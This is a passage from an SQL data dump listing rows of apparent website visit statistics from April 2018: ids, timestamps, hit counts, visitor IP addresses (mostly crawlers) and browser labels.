41,1,1,0,0,'54.36.148.45','other'),(230672,1523039829,1,1,0,0,'54.36.148.149','other'),(230673,1523039886,1,1,0,0,'54.36.149.10','other'),(230674,1523039895,1,1,0,0,'54.36.148.29','other'),(230675,1523039914,1,1,0,0,'54.36.148.87','other'),(230676,1523039949,1,1,0,0,'141.8.142.74','other'),(230677,1523040016,1,1,0,0,'54.165.176.205','other'),(230678,1523040197,1,1,0,0,'54.36.149.61','other'),(230679,1523040224,1,1,0,0,'54.36.149.24','other'),(230680,1523040283,1,1,0,0,'207.46.13.58','other'),(230681,1523040324,1,1,0,0,'54.36.148.122','other'),(230682,1523040357,1,1,0,0,'35.226.23.240','other'),(230683,1523040370,1,1,0,0,'54.36.149.17','other'),(230684,1523040698,1,1,0,0,'54.36.149.89','other'),(230685,1523040818,1,1,0,0,'54.36.148.35','other'),(230686,1523040879,1,1,0,0,'188.230.43.254','other'),(230687,1523040918,1,1,0,0,'54.165.176.205','other'),(230688,1523041040,1,1,0,0,'54.36.149.74','other'),(230689,1523041180,1,1,0,0,'80.252.154.233','firefox'),(230690,1523041354,1,1,0,0,'54.36.148.15','other'),(230691,1523041618,1,1,0,0,'216.244.66.237','other'),(230692,1523041880,1,1,0,0,'54.165.176.205','other'),(230693,1523041881,1,1,0,0,'54.36.149.4','other'),(230694,1523042091,1,1,0,0,'54.36.148.46','other'),(230695,1523042270,1,1,0,0,'54.36.149.66','other'),(230696,1523042320,15,15,0,0,'23.237.4.26','other'),(230697,1523042580,1,1,0,0,'54.36.149.17','other'),(230698,1523042583,1,1,0,0,'54.36.148.77','other'),(230699,1523042733,1,1,0,0,'141.8.142.74','other'),(230700,1523042741,1,1,0,0,'54.36.148.132','other'),(230701,1523042828,1,1,0,0,'54.165.176.205','other'),(230702,1523043394,1,1,0,0,'54.36.148.247','other'),(230703,1523043573,1,0,1,0,'66.249.66.195',''),(230704,1523043744,1,1,0,0,'54.165.176.205','other'),(230705,1523043762,1,1,0,0,'54.36.149.92','other'),(230706,1523043766,1,1,0,0,'54.36.148.87','other'),(230707,1523043848,2,2,0,0,'91.196.178.166','chrome'),(230708,1523043919,1,1,0,0,'54.36.148.14','other'),(230709,1523044070,1,1,0,0,'54.36.149.8','other'),(230710,1523044137,1,1,0,0,'54.36.148.223','other'),(230711,1523044564,1,1,0,0,'54.36.148.191','other'),(230712,1523044661,1,1,0,0,'54.165.176.205','other'),(230713,1523044670,2,2,0,0,'54.36.148.47','other'),(230714,1523044701,1,1,0,0,'216.244.66.237','other'),(230715,1523044762,1,1,0,0,'54.36.148.92','other'),(230716,1523044816,1,1,0,0,'54.36.148.179','other'),(230717,1523045193,1,1,0,0,'54.36.149.67','other'),(230718,1523045252,1,1,0,0,'54.36.148.66','other'),(230719,1523045304,1,1,0,0,'54.36.148.243','other'),(230720,1523045415,1,1,0,0,'54.36.148.192','other'),(230721,1523045429,1,1,0,0,'54.36.148.96','other'),(230722,1523045597,1,1,0,0,'54.165.176.205','other'),(230723,1523045718,1,1,0,0,'141.8.142.74','other'),(230724,1523045778,2,2,0,0,'144.168.163.10','chrome'),(230725,1523045891,1,1,0,0,'54.36.148.160','other'),(230726,1523045899,1,1,0,0,'54.36.148.15','other'),(230727,1523045911,1,1,0,0,'54.36.148.164','other'),(230728,1523046050,1,1,0,0,'128.69.202.83','firefox'),(230729,1523046136,1,1,0,0,'178.154.171.88','other'),(230730,1523046166,1,1,0,0,'54.36.149.38','other'),(230731,1523046484,1,1,0,0,'54.36.148.252','other'),(230732,1523046489,1,1,0,0,'141.8.142.134','other'),(230733,1523046530,1,1,0,0,'54.165.176.205','other'),(230734,1523046639,1,1,0,0,'54.36.148.165','other'),(230735,1523046674,1,1,0,0,'54.36.149.82','other'),(230736,1523046681,1,1,0,0,'54.36.149.72','other'),(230737,1523046796,1,1,0,0,'54.36.148.80','other'),(230738,1523046857,2,2,0,0,'91.196.178.93','chrome'),(230739,1523046944,1,1,0,0,'54.36.148.83','other'),(230740,1523047072,1,1,0,0,'54.36.148.64','other'),(230741,1523047244,1,1,0,0,'54.36.149.58','other'),(230742,1523047273,1,1,0,0,'216.244.66.237','other'),(230743,1523047312,1,1,0,0,'54.36.148.231','other'),(230744,1523047441,1,1,0,0,'54.165.176.205','other'),(230745,1523047584,1,1,0,0,'141.8.142.74','other'),(230746,1523047606,1,1,0,0,'54.36.149.57','other'),(230747,1523047640,3,3,0,0,'54.165.59.7','other'),(230748,1523047935,1,1,0,0,'54.36.149.22','other'),(230749,1523047949,1,1,0,0,'66.249.66.195','chrome'),(230750,1523047952,1,1,0,0,'54.36.149.17','other'),(230751,1523048256,1,1,0,0,'54.36.148.33','other'),(230752,1523048307,1,1,0,0,'54.36.148.103','other'),(230753,1523048402,1,1,0,0,'54.165.176.205','other'),(230754,1523048571,1,1,0,0,'54.36.148.201','other'),(230755,1523048617,1,1,0,0,'54.36.148.111','other'),(230756,1523048652,1,1,0,0,'54.36.148.83','other'),(230757,1523048685,1,1,0,0,'87.250.224.46','other'),(230758,1523048710,1,1,0,0,'54.36.148.50','other'),(230759,1523048942,1,1,0,0,'54.36.148.236','other'),(230760,1523048948,1,1,0,0,'207.46.13.58','other'),(230761,1523048995,1,1,0,0,'54.36.148.22','other'),(230762,1523049127,1,1,0,0,'54.36.148.99','other'),(230763,1523049165,1,1,0,0,'54.36.148.142','other'),(230764,1523049178,1,1,0,0,'54.36.148.205','other'),(230765,1523049334,1,1,0,0,'54.165.176.205','other'),(230766,1523049349,1,1,0,0,'54.36.148.20','other'),(230767,1523049469,1,1,0,0,'141.8.142.74','other'),(230768,1523049701,1,1,0,0,'54.36.148.203','other'),(230769,1523049969,1,1,0,0,'8.29.198.27','other'),(230770,1523050122,1,1,0,0,'54.36.148.131','other'),(230771,1523050239,1,1,0,0,'54.165.176.205','other'),(230772,1523050413,1,1,0,0,'54.36.148.253','other'),(230773,1523050765,1,1,0,0,'207.46.13.58','other'),(230774,1523050835,1,1,0,0,'54.36.148.101','other'),(230775,1523050871,1,1,0,0,'141.8.142.74','other'),(230776,1523050920,1,1,0,0,'54.36.148.102','other'),(230777,1523051034,1,1,0,0,'54.165.59.7','other'),(230778,1523051097,1,1,0,0,'66.249.66.157','chrome'),(230779,1523051127,1,1,0,0,'213.180.203.8','other'),(230780,1523051152,1,1,0,0,'54.165.176.205','other'),(230781,1523051180,1,1,0,0,'54.36.148.204','other'),(230782,1523051259,1,1,0,0,'54.36.149.59','other'),(230783,1523051336,1,1,0,0,'54.36.148.176','other'),(230784,1523051469,2,2,0,0,'35.226.23.240','other'),(230785,1523051754,1,1,0,0,'157.55.39.131','other'),(230786,1523051808,1,1,0,0,'54.36.148.100','other'),(230787,1523051871,1,1,0,0,'54.36.148.19','other'),(230788,1523052370,1,1,0,0,'178.154.171.88','other'),(230789,1523052468,2,2,0,0,'54.36.149.107','other'),(230790,1523052512,1,1,0,0,'54.36.149.23','other'),(230791,1523053063,1,1,0,0,'216.244.66.237','other'),(230792,1523053532,1,1,0,0,'54.36.149.5','other'),(230793,1523053560,1,1,0,0,'54.36.148.117','other'),(230794,1523053736,1,1,0,0,'54.36.148.40','other'),(230795,1523054004,1,1,0,0,'54.36.148.34','other'),(230796,1523054149,1,1,0,0,'54.36.149.1','other'),(230797,1523054456,1,1,0,0,'54.36.149.47','other'),(230798,1523054583,1,1,0,0,'54.36.148.15','other'),(230799,1523054610,2,0,2,0,'66.249.66.201',''),(230800,1523054616,1,1,0,0,'54.36.149.71','other'),(230801,1523054809,1,1,0,0,'178.154.171.88','other'),(230802,1523055088,1,1,0,0,'54.36.148.40','other'),(230803,1523055411,1,1,0,0,'54.36.148.233','other'),(230804,1523055530,1,0,1,0,'66.249.66.201',''),(230805,1523055649,1,1,0,0,'54.36.148.201','other'),(230806,1523055727,1,1,0,0,'54.36.148.21','other'),(230807,1523055754,1,1,0,0,'54.36.148.167','other'),(230808,1523055995,1,1,0,0,'54.36.149.5','other'),(230809,1523056054,1,1,0,0,'54.36.148.113','other'),(230810,1523056080,1,1,0,0,'54.36.148.241','other'),(230811,1523056325,1,1,0,0,'54.36.148.224','other'),(230812,1523056539,1,1,0,0,'178.154.171.88','other'),(230813,1523056966,1,1,0,0,'54.36.149.22','other'),(230814,1523057019,1,1,0,0,'34.201.164.108','other'),(230815,1523057225,1,1,0,0,'141.8.142.167','other'),(230816,1523057265,1,1,0,0,'54.36.148.71','other'),(230817,1523057456,1,1,0,0,'54.36.149.97','other'),(230818,1523057778,1,1,0,0,'54.36.149.4','other'),(230819,1523057933,1,1,0,0,'34.201.164.108','other'),(230820,1523058242,1,1,0,0,'54.36.148.193','other'),(230821,1523058316,1,1,0,0,'216.244.66.237','other'),(230822,1523058328,1,1,0,0,'54.36.148.82','other'),(230823,1523058367,1,1,0,0,'54.36.148.154','other'),(230824,1523058388,1,1,0,0,'54.36.148.43','other'),(230825,1523058776,1,1,0,0,'54.36.148.247','other'),(230826,1523058849,1,1,0,0,'34.201.164.108','other'),(230827,1523059101,1,1,0,0,'178.154.171.88','other'),(230828,1523059177,1,1,0,0,'54.36.148.253','other'),(230829,1523059181,1,1,0,0,'54.36.149.15','other'),(230830,1523059579,1,0,1,0,'66.249.66.195',''),(230831,1523059767,1,1,0,0,'34.201.164.108','other'),(230832,1523059862,1,1,0,0,'54.36.148.163','other'),(230833,1523059899,1,1,0,0,'54.36.149.94','other'),(230834,1523060014,1,1,0,0,'54.36.149.92','other'),(230835,1523060116,1,1,0,0,'54.36.148.211','other'),(230836,1523060156,1,1,0,0,'54.36.148.147','other'),(230837,1523060493,1,1,0,0,'54.36.149.15','other'),(230838,1523060497,1,1,0,0,'54.36.148.139','other'),(230839,1523060669,1,1,0,0,'34.201.164.108','other'),(230840,1523060737,1,1,0,0,'54.36.148.110','other'),(230841,1523060828,1,1,0,0,'8.29.198.27','other'),(230842,1523061401,1,0,1,0,'66.249.66.201',''),(230843,1523061417,1,1,0,0,'216.244.66.237','other'),(230844,1523061442,1,1,0,0,'54.36.148.48','other'),(230845,1523061467,1,1,0,0,'54.36.148.124','other'),(230846,1523061574,1,1,0,0,'34.201.164.108','other'),(230847,1523061756,1,1,0,0,'54.36.148.215','other'),(230848,1523061985,1,1,0,0,'54.36.148.205','other'),(230849,1523062436,1,1,0,0,'54.36.148.216','other'),(230850,1523062477,1,1,0,0,'34.201.164.108','other'),(230851,1523062571,1,1,0,0,'54.36.148.48','other'),(230852,1523062825,1,1,0,0,'54.36.148.244','other'),(230853,1523062911,1,1,0,0,'54.36.148.12','other'),(230854,1523063132,1,1,0,0,'54.36.148.222','other'),(230855,1523063262,1,1,0,0,'54.36.148.214','other'),(230856,1523063383,1,1,0,0,'34.201.164.108','other'),(230857,1523063531,1,1,0,0,'178.154.200.8','other'),(230858,1523063651,1,1,0,0,'54.36.148.43','other'),(230859,1523063680,1,1,0,0,'54.36.148.223','other'),(230860,1523064057,1,1,0,0,'54.36.148.98','other'),(230861,1523064286,1,1,0,0,'54.36.149.83','other'),(230862,1523064303,1,1,0,0,'34.201.164.108','other'),(230863,1523064922,1,1,0,0,'54.36.148.173','other'),(230864,1523064950,1,1,0,0,'37.9.113.157','other'),(230866,1523064961,1,0,1,0,'66.249.66.157',''),(230867,1523065205,2,2,0,0,'34.201.164.108','other'),(230868,1523065213,1,1,0,0,'37.9.113.110','other'),(230869,1523065310,1,1,0,0,'54.36.149.29','other'),(230870,1523065626,1,1,0,0,'54.36.148.136','other'),(230871,1523065687,1,1,0,0,'54.36.148.118','other'),(230872,1523065972,1,1,0,0,'54.36.148.57','other'),(230873,1523066108,1,1,0,0,'34.201.164.108','other'),(230874,1523066579,1,0,1,0,'66.249.66.201',''),(230875,1523066621,1,1,0,0,'54.36.149.104','other'),(230876,1523066871,1,1,0,0,'54.36.148.51','other'),(230877,1523067013,1,1,0,0,'34.201.164.108','other'),(230878,1523067317,1,1,0,0,'54.36.148.238','other'),(230879,1523067462,1,1,0,0,'54.36.149.8','other'),(230880,1523067661,1,0,1,0,'66.249.66.199',''),(230881,1523067764,1,1,0,0,'54.36.148.170','other'),(230882,1523067892,1,1,0,0,'54.36.149.4','other'),(230883,1523067943,1,1,0,0,'34.201.164.108','other'),(230884,1523068096,1,1,0,0,'178.154.171.88','other'),(230885,1523068406,1,0,1,0,'66.249.66.201',''),(230886,1523068416,1,1,0,0,'54.36.149.26','other'),(230887,1523068853,1,1,0,0,'34.201.164.108','other'),(230888,1523069029,1,1,0,0,'54.36.148.139','other'),(230889,1523069490,1,1,0,0,'178.154.171.88','other'),(230890,1523069531,1,1,0,0,'54.36.148.48','other'),(230891,1523069619,1,1,0,0,'54.36.148.54','other'),(230892,1523069657,1,1,0,0,'54.36.149.105','other'),(230893,1523069659,1,1,0,0,'54.36.148.18','other'),(230894,1523069769,1,1,0,0,'34.201.164.108','other'),(230895,1523069971,1,1,0,0,'54.36.149.48','other'),(230896,1523070224,1,1,0,0,'54.36.148.116','other'),(230897,1523070315,1,1,0,0,'54.36.149.70','other'),(230898,1523070408,1,1,0,0,'54.36.148.156','other'),(230899,1523070501,1,1,0,0,'54.36.149.77','other'),(230900,1523070642,1,1,0,0,'54.36.148.65','other'),(230901,1523070691,1,1,0,0,'34.201.164.108','other'),(230902,1523070715,1,1,0,0,'54.36.148.87','other'),(230903,1523071072,1,1,0,0,'54.36.148.136','other'),(230904,1523071152,1,1,0,0,'54.36.149.37','other'),(230905,1523071238,1,1,0,0,'54.36.148.210','other'),(230906,1523071316,1,1,0,0,'54.36.148.196','other'),(230907,1523071410,1,1,0,0,'54.36.149.44','other'),(230908,1523071431,1,1,0,0,'141.8.142.74','other'),(230909,1523071526,1,1,0,0,'54.36.148.23','other'),(230910,1523071589,1,1,0,0,'54.36.148.167','other'),(230911,1523071605,1,1,0,0,'34.201.164.108','other'),(230912,1523071654,1,1,0,0,'54.36.149.5','other'),(230913,1523071702,1,1,0,0,'54.36.148.211','other'),(230914,1523071718,1,1,0,0,'8.29.198.26','other'),(230915,1523071849,1,1,0,0,'54.36.148.120','other'),(230916,1523071996,1,1,0,0,'54.36.149.19','other'),(230917,1523072371,1,1,0,0,'54.36.149.81','other'),(230918,1523072516,1,1,0,0,'34.201.164.108','other'),(230919,1523072537,1,1,0,0,'178.154.171.88','other'),(230920,1523072876,1,1,0,0,'54.36.149.57','other'),(230921,1523073120,1,1,0,0,'54.36.148.165','other'),(230922,1523073428,1,1,0,0,'34.201.164.108','other'),(230923,1523073456,1,1,0,0,'54.36.148.154','other'),(230924,1523074022,2,2,0,0,'141.8.142.74','other'),(230925,1523074221,1,1,0,0,'54.36.148.116','other'),(230926,1523074333,1,1,0,0,'34.201.164.108','other'),(230927,1523074495,1,1,0,0,'54.36.149.13','other'),(230928,1523074539,1,1,0,0,'54.36.149.61','other'),(230929,1523074594,1,1,0,0,'54.36.149.92','other'),(230930,1523074707,1,0,1,0,'66.249.66.195',''),(230931,1523075007,1,1,0,0,'54.36.148.66','other'),(230932,1523075143,1,1,0,0,'91.209.11.236','other'),(230933,1523075257,1,1,0,0,'34.201.164.108','other'),(230934,1523075544,1,1,0,0,'54.36.148.64','other'),(230935,1523075560,1,1,0,0,'54.36.148.120','other'),(230936,1523075714,1,1,0,0,'54.36.148.109','other'),(230937,1523075738,1,0,1,0,'66.249.66.201',''),(230938,1523075827,1,0,1,0,'66.249.66.195',''),(230939,1523075834,2,2,0,0,'207.46.13.58','other'),(230940,1523075983,1,1,0,0,'141.8.142.74','other'),(230941,1523076164,1,1,0,0,'34.201.164.108','other'),(230942,1523076204,1,0,1,0,'66.249.66.158',''),(230943,1523076296,1,1,0,0,'54.36.149.14','other'),(230944,1523076835,1,1,0,0,'54.36.148.214','other'),(230945,1523076879,1,1,0,0,'54.36.148.142','other'),(230946,1523076911,1,1,0,0,'54.36.149.48','other'),(230947,1523077078,1,1,0,0,'34.201.164.108','other'),(230948,1523077376,1,1,0,0,'54.36.148.149','other'),(230949,1523077544,1,1,0,0,'54.36.149.92','other'),(230950,1523077580,1,1,0,0,'54.36.148.20','other'),(230951,1523077883,1,1,0,0,'54.36.149.34','other'),(230952,1523077985,1,1,0,0,'34.201.164.108','other'),(230953,1523078077,1,1,0,0,'54.36.148.148','other'),(230954,1523078126,1,1,0,0,'54.36.149.56','other'),(230955,1523078164,1,1,0,0,'54.36.148.52','other'),(230956,1523078326,1,1,0,0,'54.36.148.39','other'),(230957,1523078328,1,1,0,0,'35.226.23.240','other'),(230958,1523078423,1,1,0,0,'54.36.149.45','other'),(230959,1523078458,1,1,0,0,'54.36.148.248','other'),(230960,1523078548,1,0,1,0,'66.249.66.195',''),(230961,1523078555,1,1,0,0,'54.36.148.87','other'),(230962,1523078833,1,1,0,0,'141.8.142.134','other'),(230963,1523078863,1,1,0,0,'178.154.171.60','other'),(230964,1523078889,1,1,0,0,'34.201.164.108','other'),(230965,1523078930,1,1,0,0,'54.36.149.5','other'),(230966,1523078999,1,1,0,0,'54.36.149.75','other'),(230967,1523079115,1,1,0,0,'54.36.148.104','other'),(230968,1523079245,1,1,0,0,'54.36.148.204','other'),(230969,1523079303,1,0,1,0,'66.249.66.199',''),(230970,1523079580,1,1,0,0,'54.36.148.100','other'),(230971,1523079799,1,1,0,0,'34.201.164.108','other'),(230972,1523080029,1,1,0,0,'54.36.148.243','other'),(230973,1523080051,1,1,0,0,'54.36.148.214','other'),(230974,1523080062,1,1,0,0,'54.36.148.169','other'),(230975,1523080122,1,1,0,0,'54.36.148.154','other'),(230976,1523080159,1,1,0,0,'54.36.149.43','other'),(230977,1523080277,1,1,0,0,'54.36.149.57','other'),(230978,1523080360,1,1,0,0,'54.36.148.166','other'),(230979,1523080712,1,1,0,0,'34.201.164.108','other'),(230980,1523080990,1,1,0,0,'54.36.148.248','other'),(230981,1523081223,1,1,0,0,'195.191.139.220','chrome'),(230982,1523081380,1,1,0,0,'54.36.149.7','other'),(230983,1523081505,1,1,0,0,'141.8.142.74','other'),(230984,1523081629,1,1,0,0,'34.201.164.108','other'),(230985,1523081854,1,1,0,0,'54.36.148.91','other'),(230986,1523082218,1,1,0,0,'54.36.149.35','other'),(230987,1523082310,1,1,0,0,'54.36.148.222','other'),(230988,1523082419,1,1,0,0,'54.36.148.193','other'),(230989,1523082549,1,1,0,0,'34.201.164.108','other'),(230990,1523082573,1,1,0,0,'8.29.198.25','other'),(230991,1523082652,1,1,0,0,'54.165.59.7','other'),(230992,1523082711,1,1,0,0,'54.36.148.66','other'),(230993,1523082816,1,1,0,0,'54.36.148.199','other'),(230994,1523083011,1,1,0,0,'54.36.148.117','other'),(230995,1523083216,1,1,0,0,'54.36.149.27','other'),(230996,1523083459,1,1,0,0,'34.201.164.108','other'),(230997,1523083630,2,2,0,0,'141.8.142.74','other'),(230998,1523083648,1,1,0,0,'54.36.148.255','other'),(230999,1523083998,1,1,0,0,'54.36.149.0','other'),(231000,1523084104,1,1,0,0,'185.103.254.68','firefox'),(231001,1523084359,1,1,0,0,'54.36.148.86','other'),(231002,1523084360,1,1,0,0,'34.201.164.108','other'),(231003,1523084592,1,1,0,0,'54.36.149.80','other'),(231004,1523084677,1,1,0,0,'54.36.148.130','other'),(231005,1523084987,1,1,0,0,'54.36.149.11','other'),(231006,1523085262,1,1,0,0,'34.201.164.108','other'),(231007,1523085983,2,2,0,0,'141.8.142.74','other'),(231008,1523086179,1,1,0,0,'34.201.164.108','other'),(231009,1523086366,1,1,0,0,'54.36.148.19','other'),(231010,1523086564,1,1,0,0,'54.36.148.143','other'),(231011,1523086666,1,1,0,0,'54.36.149.73','other'),(231012,1523086837,1,1,0,0,'54.36.148.137','other'),(231013,1523087007,1,1,0,0,'54.36.148.30','other'),(231014,1523087028,1,1,0,0,'54.36.148.186','other'),(231015,1523087093,1,1,0,0,'34.201.164.108','other'),(231016,1523087141,1,1,0,0,'54.36.148.153','other'),(231017,1523087152,1,1,0,0,'54.36.148.249','other'),(231018,1523087386,1,1,0,0,'54.36.149.59','other'),(231019,1523087475,1,1,0,0,'54.36.149.19','other'),(231020,1523087507,1,1,0,0,'54.36.148.177','other'),(231021,1523087580,1,1,0,0,'54.165.59.7','other'),(231022,1523087828,1,1,0,0,'54.36.148.81','other'),(231023,1523087875,1,1,0,0,'141.8.142.74','other'),(231024,1523087996,1,1,0,0,'34.201.164.108','other'),(231025,1523088265,1,1,0,0,'54.36.148.211','other'),(231026,1523088306,1,1,0,0,'54.36.148.222','other'),(231027,1523088514,1,1,0,0,'216.244.66.237','other'),(231028,1523088536,1,1,0,0,'54.36.148.107','other'),(231029,1523088595,1,1,0,0,'91.196.178.97','firefox'),(231030,1523088871,1,1,0,0,'54.36.149.6','other'),(231031,1523088903,1,1,0,0,'34.201.164.108','other'),(231032,1523089010,1,1,0,0,'54.36.148.52','other'),(231033,1523089225,2,2,0,0,'95.213.141.126','opera'),(231034,1523089231,1,1,0,0,'54.36.148.131','other'),(231035,1523089526,1,1,0,0,'54.36.148.132','other'),(231036,1523089685,1,1,0,0,'54.36.149.30','other'),(231037,1523089687,1,1,0,0,'54.36.148.135','other'),(231038,1523089749,1,1,0,0,'54.36.148.168','other'),(231039,1523089816,1,1,0,0,'34.201.164.108','other'),(231040,1523089913,1,1,0,0,'141.8.142.74','other'),(231041,1523090251,1,1,0,0,'54.36.149.43','other'),(231042,1523090282,2,2,0,0,'216.244.66.237','other'),(231043,1523090530,2,2,0,0,'54.36.148.254','other'),(231044,1523090642,1,1,0,0,'54.36.149.26','other'),(231045,1523090722,1,1,0,0,'34.201.164.108','other'),(231046,1523090730,1,1,0,0,'54.36.148.160','other'),(231047,1523090994,1,1,0,0,'54.36.148.61','other'),(231048,1523091151,1,1,0,0,'54.36.149.38','other'),(231049,1523091334,1,1,0,0,'54.36.148.170','other'),(231050,1523091481,1,1,0,0,'141.8.142.74','other'),(231051,1523091653,1,1,0,0,'34.201.164.108','other'),(231052,1523091716,1,1,0,0,'66.249.66.195','chrome'),(231053,1523091791,1,1,0,0,'54.36.148.254','other'),(231054,1523091964,1,1,0,0,'54.36.149.5','other'),(231055,1523092104,1,1,0,0,'54.36.148.223','other'),(231056,1523092271,1,1,0,0,'54.36.148.225','other'),(231057,1523092516,1,1,0,0,'54.36.148.37','other'),(231058,1523092557,1,1,0,0,'34.201.164.108','other'),(231059,1523092727,1,1,0,0,'54.36.148.191','other'),(231060,1523092736,1,1,0,0,'54.36.148.108','other'),(231061,1523092755,1,1,0,0,'216.244.66.237','other'),(231062,1523093132,1,1,0,0,'178.154.200.41','other'),(231063,1523093134,1,1,0,0,'178.154.171.81','other'),(231064,1523093378,1,0,1,0,'66.249.66.195',''),(231065,1523093437,1,1,0,0,'8.29.198.25','other'),(231066,1523093473,1,1,0,0,'34.201.164.108','other'),(231067,1523093540,1,1,0,0,'54.36.149.73','other'),(231068,1523093571,1,1,0,0,'54.36.148.26','other'),(231069,1523093749,1,1,0,0,'54.36.148.182','other'),(231070,1523093977,1,1,0,0,'54.36.148.46','other'),(231071,1523094126,1,1,0,0,'54.36.148.73','other'),(231072,1523094229,1,1,0,0,'54.36.148.98','other'),(231073,1523094236,1,1,0,0,'54.36.149.94','other'),(231074,1523094384,1,1,0,0,'34.201.164.108','other'),(231075,1523094593,2,2,0,0,'141.8.142.74','other'),(231076,1523094752,1,1,0,0,'54.36.149.96','other'),(231077,1523094804,1,1,0,0,'216.244.66.237','other'),(231078,1523095028,1,1,0,0,'54.36.149.86','other'),(231079,1523095169,1,1,0,0,'54.36.149.70','other'),(231080,1523095215,1,1,0,0,'54.36.148.60','other'),(231081,1523095287,1,1,0,0,'34.201.164.108','other'),(231082,1523095371,1,1,0,0,'66.249.66.199','chrome'),(231083,1523095487,1,1,0,0,'54.36.148.255','other'),(231084,1523095501,1,1,0,0,'178.154.171.88','other'),(231085,1523095599,1,1,0,0,'54.36.148.186','other'),(231086,1523095758,1,1,0,0,'54.36.148.101','other'),(231087,1523095759,1,1,0,0,'54.36.149.65','other'),(231088,1523096152,1,1,0,0,'54.36.148.161','other'),(231089,1523096191,1,1,0,0,'34.201.164.108','other'),(231090,1523096579,1,1,0,0,'54.36.149.74','other'),(231091,1523096778,1,1,0,0,'54.36.148.214','other'),(231092,1523097101,1,1,0,0,'54.36.149.49','other'),(231093,1523097107,1,1,0,0,'34.201.164.108','other'),(231094,1523097163,1,1,0,0,'54.36.148.74','other'),(231095,1523097202,1,1,0,0,'216.244.66.237','other'),(231096,1523097472,1,1,0,0,'54.36.148.213','other'),(231097,1523097626,1,1,0,0,'66.249.66.199','chrome'),(231098,1523097841,1,1,0,0,'54.36.148.226','other'),(231099,1523098008,1,1,0,0,'54.36.148.190','other'),(231100,1523098009,1,1,0,0,'54.36.149.83','other'),(231101,1523098054,1,1,0,0,'34.201.164.108','other'),(231102,1523098743,1,1,0,0,'54.36.148.191','other'),(231103,1523098975,1,1,0,0,'34.201.164.108','other'),(231104,1523099360,1,1,0,0,'216.244.66.237','other'),(231105,1523099367,1,1,0,0,'54.36.149.29','other'),(231106,1523099533,1,1,0,0,'54.36.148.247','other'),(231107,1523099864,1,1,0,0,'178.154.171.88','other'),(231108,1523099912,1,1,0,0,'54.36.148.33','other'),(231109,1523099994,1,1,0,0,'34.201.164.108','other'),(231110,1523100051,1,1,0,0,'54.36.148.116','other'),(231111,1523100235,1,1,0,0,'54.36.148.180','other'),(231112,1523100244,1,1,0,0,'141.8.142.74','other'),(231113,1523100652,1,1,0,0,'54.36.148.179','other'),(231114,1523100780,1,1,0,0,'54.36.149.88','other'),(231115,1523100798,1,1,0,0,'54.36.149.62','other'),(231116,1523100861,1,1,0,0,'54.36.148.131','other'),(231117,1523100904,1,1,0,0,'34.201.164.108','other'),(231118,1523101109,1,1,0,0,'54.36.148.171','other'),(231119,1523101668,1,1,0,0,'54.36.148.34','other'),(231120,1523101849,1,1,0,0,'34.201.164.108','other'),(231121,1523101863,1,1,0,0,'35.196.46.35','firefox'),(231122,1523101932,1,1,0,0,'54.36.148.136','other'),(231123,1523102157,1,1,0,0,'54.36.149.88','other'),(231124,1523102366,1,1,0,0,'54.36.148.252','other'),(231125,1523102396,1,1,0,0,'54.36.148.238','other'),(231126,1523102451,1,1,0,0,'54.36.148.234','other'),(231127,1523102733,1,1,0,0,'54.36.149.78','other'),(231128,1523102780,1,1,0,0,'34.201.164.108','other'),(231129,1523102856,1,0,1,0,'66.249.66.201',''),(231130,1523103045,2,2,0,0,'54.36.148.60','other'),(231131,1523103637,1,1,0,0,'54.36.148.45','other'),(231132,1523103667,1,1,0,0,'54.36.149.69','other'),(231133,1523103684,1,1,0,0,'34.201.164.108','other'),(231134,1523103861,1,1,0,0,'54.36.148.33','other'),(231135,1523104003,1,1,0,0,'54.36.148.37','other'),(231136,1523104081,1,1,0,0,'54.36.148.20','other'),(231137,1523104091,1,1,0,0,'216.244.66.237','other'),(231138,1523104157,1,1,0,0,'91.196.178.161','firefox'),(231139,1523104315,1,1,0,0,'8.29.198.25','other'),(231140,1523104443,2,2,0,0,'141.8.142.74','other'),(231141,1523104457,1,1,0,0,'54.36.148.156','other'),(231142,1523104578,1,1,0,0,'54.36.148.139','other'),(231143,1523104599,1,1,0,0,'34.201.164.108','other'),(231144,1523104679,1,1,0,0,'54.36.149.21','other'),(231145,1523104734,1,1,0,0,'54.36.149.16','other'),(231146,1523105110,1,0,1,0,'66.249.66.201',''),(231147,1523105500,1,1,0,0,'34.201.164.108','other'),(231148,1523105703,1,1,0,0,'54.36.148.30','other'),(231149,1523105735,1,1,0,0,'54.36.148.77','other'),(231150,1523105829,1,1,0,0,'64.246.187.42','firefox'),(231151,1523105913,1,1,0,0,'216.244.66.237','other'),(231152,1523106166,1,1,0,0,'54.36.148.218','other'),(231153,1523106406,1,1,0,0,'34.201.164.108','other'),(231154,1523106611,1,1,0,0,'157.55.39.4','other'),(231155,1523106918,1,1,0,0,'54.36.148.157','other'),(231156,1523107009,1,1,0,0,'54.36.148.226','other'),(231157,1523107025,1,1,0,0,'54.36.148.33','other'),(231158,1523107228,1,1,0,0,'35.226.23.240','other'),(231159,1523107313,1,1,0,0,'34.201.164.108','other'),(231160,1523107335,1,1,0,0,'54.36.148.205','other'),(231161,1523108240,1,1,0,0,'34.201.164.108','other'),(231162,1523108392,1,1,0,0,'54.36.148.29','other'),(231163,1523108483,1,1,0,0,'54.36.149.98','other'),(231164,1523108490,1,1,0,0,'54.36.148.132','other'),(231165,1523108493,1,1,0,0,'54.36.148.134','other'),(231166,1523108558,1,1,0,0,'54.36.148.192','other'),(231167,1523108627,1,1,0,0,'54.36.149.44','other'),(231168,1523108669,1,1,0,0,'54.36.148.122','other'),(231169,1523109048,1,1,0,0,'54.36.148.166','other'),(231170,1523109146,1,1,0,0,'34.201.164.108','other'),(231171,1523109257,1,1,0,0,'54.36.148.108','other'),(231172,1523109285,1,1,0,0,'54.36.148.58','other'),(231173,1523109645,1,1,0,0,'54.36.148.205','other'),(231174,1523110069,1,1,0,0,'34.201.164.108','other'),(231175,1523110132,1,1,0,0,'216.244.66.237','other'),(231176,1523110228,1,1,0,0,'54.36.148.33','other'),(231177,1523110232,1,1,0,0,'54.36.148.243','other'),(231178,1523110286,1,1,0,0,'54.36.148.174','other'),(231179,1523110322,1,1,0,0,'54.36.148.252','other'),(231180,1523110911,1,1,0,0,'54.36.149.67','other'),(231181,1523111004,1,1,0,0,'34.201.164.108','other'),(231182,1523111092,1,1,0,0,'54.36.148.13','other'),(231183,1523111119,1,1,0,0,'66.249.66.195','chrome'),(231184,1523111181,1,1,0,0,'54.36.149.65','other'),(231185,1523111227,1,1,0,0,'87.250.224.46','other'),(231186,1523111786,1,1,0,0,'54.36.148.48','other'),(231187,1523111835,1,1,0,0,'54.36.148.14','other'),(231188,1523111912,1,1,0,0,'34.201.164.108',